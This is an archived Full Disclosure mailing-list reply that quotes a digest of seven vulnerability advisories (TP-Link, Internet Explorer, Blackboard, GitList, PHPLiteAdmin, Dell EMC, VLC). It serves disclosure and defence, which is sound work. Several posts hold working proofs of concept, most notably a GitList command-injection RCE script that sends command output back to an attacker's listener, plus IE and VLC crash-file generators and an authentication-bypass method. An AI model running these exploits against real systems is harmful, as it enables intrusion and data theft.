Full Disclosure mailing list archives
Re: Unvalidated Redirect in Shibboleth component of Blackboard
From: Derrek Bertrand <derrekbertrand () gmail com>
Date: Fri, 27 Apr 2018 19:54:49 +0000
Blackboard's code base is related to some other education suites (Canvas?). I can't remember which ones, but this is one of those components that rarely get touched after they're written. You might try checking some of the other commercial and open source products for this issue if you have access to them. I have someone I can ask for more details on the product history if needed. Hope this is helpful. On Apr 27, 2018 12:00 PM, <fulldisclosure-request () seclists org> wrote: Send Fulldisclosure mailing list submissions to fulldisclosure () seclists org To subscribe or unsubscribe via the World Wide Web, visit https://nmap.org/mailman/listinfo/fulldisclosure or, via email, send a message with subject or body 'help' to fulldisclosure-request () seclists org You can reach the person managing the list at fulldisclosure-owner () seclists org When replying, please edit your Subject line so it is more specific than "Re: Contents of Fulldisclosure digest..." Today's Topics: 1. [RCE] TP-Link Remote Code Execution CVE-2017-13772 v2 - >180, 000 affected devices (Andrew Mabbitt) 2. [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service (hyp3rlinx) 3. Unvalidated Redirect in Shibboleth component of Blackboard Learn (Ethan Sweet) 4. GitList 0.6 Unauthenticated RCE (Kacper Szurek) 5. Re: Authorization bypass in PHPLiteAdmin since 1.9.5 (Karsten K?nig) 6. DSA-2018-013: Dell EMC ECOM XML External Entity Injection Vulnerability (EMC Product Security Response Center) 7. VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC) (Kroppoloe) ---------- Forwarded message ---------- From: Andrew Mabbitt <andrew () fidusinfosec com> To: fulldisclosure () seclists org Cc: Bcc: Date: Thu, 26 Apr 2018 15:32:43 +0100 Subject: [FD] [RCE] TP-Link Remote Code Execution CVE-2017-13772 v2 - >180, 000 affected devices Title: [CVE-2017-13772] TPLink TLWR740N Remote Code Execution Blog URL: https://www.fidusinfosec.com/a-curious-case-of-code-reuse-tplink-cve-2017-13772-v2/ Vendor: TP-Link Date Published: 26/04/2018 CVE: CVE-2017-13772 ** Vulnerability Summary A remote code execution vulnerability was identified in TP-Link's WR740N home WiFi router. Valid credentials are required for this attack path. It is possible for an authenticated attacker to obtain a remote shell with root privileges. This vulnerability of a clone of CVE-2017-13772 reported by the Fidus team last year. There are currently >180,000 affected devices searchable on Shodan. ** Vendor Response The vendor response has been lacking and a patch has still not been released after 3 months. ** Report Timeline 25/1/18 – Initial contact with description of issue, contact with security () tp-link com 26/1/18 – Reply from TP-Link asking for more details, sent them the details for CVE-2017-13772 (wr940n model). 1/2/18 – TP_Link inform us they are looking into the issue. 15/2/18 – Request from us for an update. 30/2/18 – Request from us for an update. 26/3/18 – Another request for an update, warning of public disclosure sent. 28/3/18 – Reply from security () tp-link com, inform us they are releasing a patch in the “recent days”. 29/3/18 – security () tp-link com send us beta firmware to fix the issue. 29/3/18 – Sent a reply to security () tp-link com to confirm the issue fixed. 9/4/18 – Request for an estimate for when the firmware goes live. 18/4/18 – Another request, another warning of public disclosure sent. 26/4/18 – No reply received, public disclosure of vulnerability. ** Credit This vulnerability was discovered by Tim Carrington @__invictus_, part of the Fidus Information Security research team. ** References https://www.fidusinfosec.com/a-curious-case-of-code-reuse-tplink-cve-2017-13772-v2/ <https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/> ** Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ ---------- Forwarded message ---------- From: hyp3rlinx <apparitionsec () gmail com> To: fulldisclosure () seclists org Cc: Bcc: Date: Wed, 25 Apr 2018 11:16:49 -0400 Subject: [FD] [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: =======www.microsoft.com Product: ======== Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: ================== Denial Of Service CVE Reference: ============== N/A Security Issue: ================ A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :) Tested Windows 10 Stack Dump: ========== (2e8c.27e4): Access violation - code c0000005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret 0:015> r rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003 rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003 rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000 r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000 rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000 rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600 r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398 r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060 r14=0000000000000002 r15=0000000000000001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=???? Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000000 Parameter[1]: 0000000000000000 Attempt to read from address 0000000000000000 DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==============https://vimeo.com/265691256/ Exploit/POC: ============ 1) Run below python script to create "IE-Win10-Crasha.html" 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=('<br>\n'+ '<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+ '<a href=".cmd:" id="hate">crashy ware shee</a>\n'+ '<br>\n'+ 'Tested successfully on Windows 10\n'+ '</center><script>\n' 'function doit(){\n'+ 'document.getElementById("hate").click();\n'+ 'alert("DOH!");\n'+ '}\n'+ 'setInterval("doit()", 2000)\n'+ '</script>') file=open("IE-Win10-Crasha.html","w") file.write(payload) file.close() print 'MS InternetExplorer (Win 10) ' print 'Denial Of Service File Created.' print 'hyp3rlinx' Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ---------- Forwarded message ---------- From: Ethan Sweet <ethan () ethan pm> To: fulldisclosure <fulldisclosure () seclists org> Cc: Bcc: Date: Thu, 26 Apr 2018 14:13:45 -0700 Subject: [FD] Unvalidated Redirect in Shibboleth component of Blackboard Learn CVE-2017-18262 [Description] Since at least the 17th of October 2017 (Initial report date) Blackboard Learn has allowed Unvalidated Redirects on any signed in user through its endpoints for handling Shibboleth logins. The vulnerable endpoint is: BLACKBOARD/webapps/bb-auth-provider-shibboleth-BBLEARN/execute/shibbolethLogin?returnUrl=myEvilUrl&authProviderId=realAuthProvider Where: BLACKBOARD is the Blackboard Learn web server endpoint. myEvilUrl is any URL you want, URL encoded of course. realAuthProvider is the auth provider, normally you can just gather this by attempting a real shibboleth login and looking at what authProviderId is set to. This attack only works against Blackboard Learn web servers with Shibboleth set up. [Reproduction steps] Set up a blackboard learn web server, make sure shibboleth is set up. Copy the shibboleth login URL from the sign in page (should look like the endpoint above) Replace the returnUrl with another URL (myEvilUrl). Open the URL and log in as normal (if not already signed in properly to complete shibboleth login). You will be redirected to the returnUrl you gave, regardless of what that url is. [Type] Unvalidated Redirect [Vendor] Blackboard Inc [Discoverer] Ethan Sweet ---------- Forwarded message ---------- From: Kacper Szurek <kacperszurek () gmail com> To: fulldisclosure () seclists org Cc: Bcc: Date: Thu, 26 Apr 2018 14:14:12 +0200 Subject: [FD] GitList 0.6 Unauthenticated RCE # Exploit Title: GitList 0.6 Unauthenticated RCE # Date: 25-04-2018 # Software Link: https://github.com/klaussilveira/gitlist # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: remote 1. Description Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`. More info about this technique: https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html 2. Proof of Concept ```python import requests from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import urlparse import urllib import threading import time import os import re url = 'http://192.168.1.1/gitlist/' command = 'id' your_ip = '192.168.1.100' your_port = 8001 print "GitList 0.6 Unauthenticated RCE" print "by Kacper Szurek" print "https://security.szurek.pl/" print "REMEMBER TO DISABLE FIREWALL" search_url = None r = requests.get(url) repos = re.findall(r'/([^/]+)/master/rss', r.text) if len(repos) == 0: print "[-] No repos" os._exit(0) for repo in repos: print "[+] Found repo {}".format(repo) r = requests.get("{}{}".format(url, repo)) files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text) for file in files: r = requests.get("{}{}/raw/master/{}".format(url, repo, file)) print "[+] Found file {}".format(file) print r.text[0:100] search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1]) break if not search_url: print "[-] No files in repo" os._exit(0) print "[+] Search using {}".format(search_url) class GetHandler(BaseHTTPRequestHandler): def do_GET(self): parsed_path = urlparse.urlparse(self.path) print "[+] Command response" print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:] self.send_response(200) self.end_headers() self.wfile.write("OK") os._exit(0) def log_message(self, format, *args): return def exploit_server(): server = HTTPServer((your_ip, your_port), GetHandler) server.serve_forever() print "[+] Start server on {}:{}".format(your_ip, your_port) t = threading.Thread(target=exploit_server) t.daemon = True t.start() print "[+] Server started" r = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http:// {}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)}) while True: time.sleep(1) ``` 3. Solution: Update to version 0.7.0 https://github.com/klaussilveira/gitlist/releases/tag/0.7.0 ---------- Forwarded message ---------- From: "Karsten König" <mail () kkoenig net> To: fulldisclosure () seclists org Cc: Bcc: Date: Wed, 25 Apr 2018 10:58:09 +0200 Subject: Re: [FD] Authorization bypass in PHPLiteAdmin since 1.9.5 Hello, wbowling from GitHub found out that this bug is even more serious and can be used to bypass the authorization for arbitary passwords. The bug is in Line 40 of classes/Authorization.php[0]. The salt is generated with every reload. You can create cookies again and again until you have a salt which gives you a hash like '0e179250003459658275905707244744'. Now you can login with that specific salt and '0' as the cookie. Best, Karsten [0] https://github.com/phpLiteAdmin/pla/blob/f3998704a846ddf71539092cd6fe84f2e9c35725/classes/Authorization.php#L40 On 23.04.2018 06:41, Karsten König wrote:
Hello, I found a small issue in PHPLiteAdmin. It's an authorization bypass which works since version 1.9.5 from 2014 (current is 1.9.7.1) because PLA uses '==' instead of '===' for the password comparison in 'attemptGrant' of the 'Authorization' class. If the password is set to one which correspondends to a number in scientific notation, one could easier bruteforce the password or bypass it completely, e.g.: php > var_dump('200' == '2e2'); bool(true) php > var_dump('0' == '0e2'); bool(true) php > var_dump('0' == '0e2342'); bool(true) I opened an issue at GitHub for this[0] and have written about it[1] (section 2 is the interesting one for this issue). Best, Karsten [0] https://github.com/phpLiteAdmin/pla/issues/11 [1]
http://k3research.outerhaven.de/posts/small-mistakes-lead-to-big-problems.html
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
---------- Forwarded message ---------- From: EMC Product Security Response Center <Security_Alert () emc com> To: "'fulldisclosure () seclists org'" <fulldisclosure () seclists org> Cc: Bcc: Date: Wed, 25 Apr 2018 19:01:35 +0000 Subject: [FD] DSA-2018-013: Dell EMC ECOM XML External Entity Injection Vulnerability -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 DSA-2018-013: Dell EMC ECOM XML External Entity Injection Vulnerability EMC Identifier: DSA-2018-013 CVE Identifier: CVE-2018-1183 Severity: High Severity Rating: CVSS Base Score: 7.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L) Affected products: Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.8 Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.8 Dell EMC VASA Provider Virtual Appliance versions prior to 8.4.0.512 Dell EMC SMIS versions prior to 8.4.0.6 Dell EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4.0.347 Dell EMC VNX2 Operating Environment (OE) for File versions prior to 8.1.9.231 Dell EMC VNX2 Operating Environment (OE) for Block versions prior to 05.33.009.5.231 Dell EMC VNX1 Operating Environment (OE) for File versions prior to 7.1.82.0 Dell EMC VNX1 Operating Environment (OE) for Block versions prior to 05.32.000.5.225 Dell EMC VNXe3200 Operating Environment (OE) all versions Dell EMC VNXe1600 Operating Environment (OE) versions prior to 3.1.9.9570228 Dell EMC VNXe 3100/3150/3300 Operating Environment (OE) all versions Dell EMC ViPR SRM versions 3.7, 3.7.1, 3.7.2 (only if using Dell EMC Host Interface for Windows) Dell EMC ViPR SRM versions 4.0, 4.0.1, 4.0.2, 4.0.3 (only if using Dell EMC Host Interface for Windows) Dell EMC XtremIO versions 4.x Dell EMC VMAX eNAS version 8.x Dell EMC Unity Operating Environment (OE) versions prior to 4.3.0.1522077968 Summary: The Dell EMC Common Object Manager (ECOM) component used in multiple Dell EMC products is affected by a XML External Entity (XXE) Injection vulnerability that may potentially be exploited by malicious users to compromise the affected system. Details: ECOM is affected by a XXE injection vulnerability due to the configuration of the XML parser shipped with the product. XXE Injection attack may occur when XML input containing a reference to an external entity (defined by the attacker) is processed by an affected XML parser. XXE Injection may allow attackers to gain unauthorized access to files containing sensitive information or may be used to cause denial-of-service. ECOM is used in Dell EMC products listed under affected products above. Resolution: The following Dell EMC product releases address this vulnerability: Host Installs: Dell EMC SMI-S 8.4.0.6 hotfix 2052, Service Alert 1886. Dell EMC ViPR SRM 4.1.1 (only the Dell EMC Host Interface for Windows, version 1.4.1) ESX Server Installs: Dell EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 OVA. Dell EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 ISO. Dell EMC Solutions Enabler Virtual Appliance 8.4.0.15 OVA. Dell EMC Solutions Enabler Virtual Appliance 8.4.0.15 ISO. Dell EMC VASA Provider Virtual Appliance 8.4.0.512 OVA. Dell EMC VASA Provider Virtual Appliance 8.4.0.512 ISO. VMAX eManagement: eMGMT 1.4.0.350 VNX Series: Dell EMC VNX2 Operating Environment (OE) for File 8.1.9.231 Dell EMC VNX2 Operating Environment (OE) for Block 05.33.009.5.231 Dell EMC VNX1 Operating Environment (OE) for File 7.1.82.0 Dell EMC VNX1 Operating Environment (OE) for Block 05.32.000.5.225 Dell EMC VNXe1600 Operating Environment (OE) 3.1.9.9570228 Unity: Dell EMC Unity Operating Environment (OE) 4.3.0.1522077968 Dell EMC recommends all customers upgrade at the earliest opportunity. Dell EMC is working on fixes for remaining products below. This advisory will be updated as fixes for these products are made available. Dell EMC XtremIO versions 4.x Dell EMC VMAX eNAS versions 8.x Dell EMC VNXe 3100/3150/3300 Operating Environment (OE) all versions Dell EMC VNXe3200 Operating Environment (OE) all versions Link To Remedies: Host Installs: Dell EMC ViPR SRM 4.1.1 Host Interface Setup File (for Dell EMC Host Interface version 1.4.1) can be downloaded from https://support.Dell EMC.com/downloads/34247_ViPR-SRM. Customers are recommended to contact customer support and place a Customer Service Request for this fix. ESX Server Installs: Dell EMC Unisphere for VMAX Virtual Appliance can be downloaded from https://support.Dell EMC.com/downloads/27045_Unisphere-for-VMAX Dell EMC VASA Provider Virtual Appliance can be downloaded from https://support.Dell EMC.com/downloads/40557_VASA-Provider VMAX eManagement: Customers are recommended to contact customer support and place a Customer Service Request for this fix. VNX Series: Dell EMC VNX2 Operating Environment (OE) for File 8.1.9.231 Dell EMC VNX2 Operating Environment (OE) for Block 05.33.009.5.231 Dell EMC VNX1 Operating Environment (OE) for File 7.1.82.0 Dell EMC VNX1 Operating Environment (OE) for Block 05.32.000.5.225 Dell EMC VNXe1600 Operating Environment (OE) 3.1.9.9570228 can be downloaded from https://support.emc.com/downloads/38171_VNXe1600 Unity: Dell EMC Unity Operating Environment (OE) 4.3.0.1522077968 can be downloaded from https://support.emc.com/downloads/39949_Dell-EMC-Unity-Family Customers are recommended to contact customer support and place a Customer Service Request for all other fixes. Credits: Dell EMC would like to thank Jakub Palaczynski for reporting this vulnerability. Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase solution emc218831. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJa4M//AAoJEHbcu+fsE81ZnwQH/jLDSZcQPRCsX35D1BL8UBwD IdmTl5mfSTe4JrOJmQkGNWTDYNEYvk3izhfQHd/HP+GqhT3Q7yDQPYr2FROPcKFF YsEbyUTL33Gb9PyzaIejt/Zf/7SpLIwDM5W3M5WSsutY/8lmRxUhGrL7NPAYZ8OI P3gaxHAoLxYED4e0K4nzVfTyyWaRPDHw680fCHXgYNlB92SPfP+X1FX4jKxJDp+7 aonKO7PcY7sxfwapffa3lrG4gwEuj0ce5JqT5kQZxncyJDB7auv4MPHE4W8neazm 5uecIrhYSfY9Scbg/AyoTH2T3lEiTGX2kT8ylxjWqz8GMpkrEJVtqQ+DUZLF/AE= =bklQ -----END PGP SIGNATURE----- ---------- Forwarded message ---------- From: Kroppoloe <kroppoloe () protonmail ch> To: "fulldisclosure () seclists org" <fulldisclosure () seclists org> Cc: Bcc: Date: Sun, 22 Apr 2018 07:29:07 -0400 Subject: [FD] VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐ On 22 April 2018 4:27 AM, Kroppoloe <kroppoloe () protonmail ch> wrote:""" VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory
Corruption (PoC)
Author: SivertPL (kroppoloe () protonmail ch) CVE: CVE-2017-8311 Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll. This is the Proof of Concept of the reverse engineered heap corruption
vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
The crash is exploitable, but hard to exploit because of various
environmental constraints such as threading/mitigations/scriptless.
I want to join a research team. """ """ ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
core demux error: option sub-original-fps does not exist (33c.d10): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
libsubtitle_plugin+0x44de: 715b44de 881f mov byte ptr [edi],bl
ds:002b:1b9fb000=??
0:012:x86> g (33c.d10): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64NotifyDebugger+0x1d: 00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h]
gs:00000000`00000030=????????????????
""" import os import struct import sys import argparse len = 1025 def main(argv): parser = argparse.ArgumentParser() parser.add_argument("filename", help="Name of the movie file w/o
extension, for generating payload")
parser.add_argument("--length", help="Heap overwrite length (default
1025, may be bigger)", type=int)
args = parser.parse_args() if args.length: global len len = args.length print "[+] Generating file %s.jss with overwrite size of %d" %
(args.filename, len)
write(args.filename, len) def write(name, len): subtitles = open("%s.jss" % name, "w+") subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n") subtitles.write("0:00:04.00 0:00:05.00 vm attack") subtitles.write("\\C") subtitles.write(struct.pack('B', 0)) subtitles.write('A' * len) subtitles.close() print "[+] Done!" if __name__ == "__main__": main(sys.argv[1:])
_______________________________________________ Full Disclosure mailing list Fulldisclosure () seclists org https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Re: Unvalidated Redirect in Shibboleth component of Blackboard Derrek Bertrand (May 01)